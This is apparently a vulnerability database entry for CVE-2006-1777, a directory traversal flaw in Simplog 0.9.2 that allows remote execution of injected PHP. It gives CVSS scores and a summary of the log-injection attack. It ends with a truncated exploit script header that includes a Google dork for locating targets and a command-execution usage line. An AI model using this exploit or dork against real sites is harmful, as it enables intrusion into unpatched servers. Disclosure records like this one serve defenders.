7.5
CVSSv2

CVE-2006-1777

Published: 13/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and previous versions allows remote malicious users to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

simplog simplog

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "Simplog <= 092 \"s\" remote cmmnds xctn\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "dork: intext:\"Powered by simplog\"\r\n\r\n"; if ($argc<5) { echo "Usage: php "$argv[0]" host path location cmd OPTIONS\r\n"; echo "host: t ...